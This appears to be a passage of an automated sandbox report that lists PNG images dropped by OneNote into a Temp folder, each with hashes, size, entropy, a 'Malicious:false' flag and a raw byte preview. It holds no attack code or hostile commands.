                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{6808A2FB-C994-4284-9857-28460758B905}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{6A41B7F8-C72A-4BA0-B7CB-F01FD40058B3}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{6AA7C499-8B9B-4199-BBE0-E5464D936F3E}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16003
                                                                                                                                                    Entropy (8bit):7.959532793770661
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                    MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                    SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                    SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                    SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{6E3DE7B1-9BA7-456D-BF90-CE424E8C19B6}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.943341403425058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                    MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                    SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                    SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                    SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{70BF80DF-3D5F-4D88-96EF-54CC2731F972}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{72927BDE-CC4B-44CB-8968-221AC03D3C39}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13737
                                                                                                                                                    Entropy (8bit):7.916899917415529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                    MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                    SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                    SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                    SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{72AB6C91-896E-471B-ABC0-29FCF8FE0903}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{74C535CB-BA50-4B7F-B394-543854CAB85D}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2599
                                                                                                                                                    Entropy (8bit):7.903700862190034
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                    MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                    SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                    SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                    SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{75FC24AE-FA4D-45F7-9E1C-78C330E876AA}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2332
                                                                                                                                                    Entropy (8bit):7.8822150338370776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                    MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                    SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                    SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                    SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{76CB4CB5-C05B-4719-A520-DC64982444FE}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16003
                                                                                                                                                    Entropy (8bit):7.959532793770661
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                    MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                    SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                    SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                    SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{7FEE891F-F757-43E9-95EB-33E61F52EAA6}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11332
                                                                                                                                                    Entropy (8bit):7.9324721568775285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                    MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                    SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                    SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                    SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{818DD083-FBDC-40F9-98EA-F25C71604FC5}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
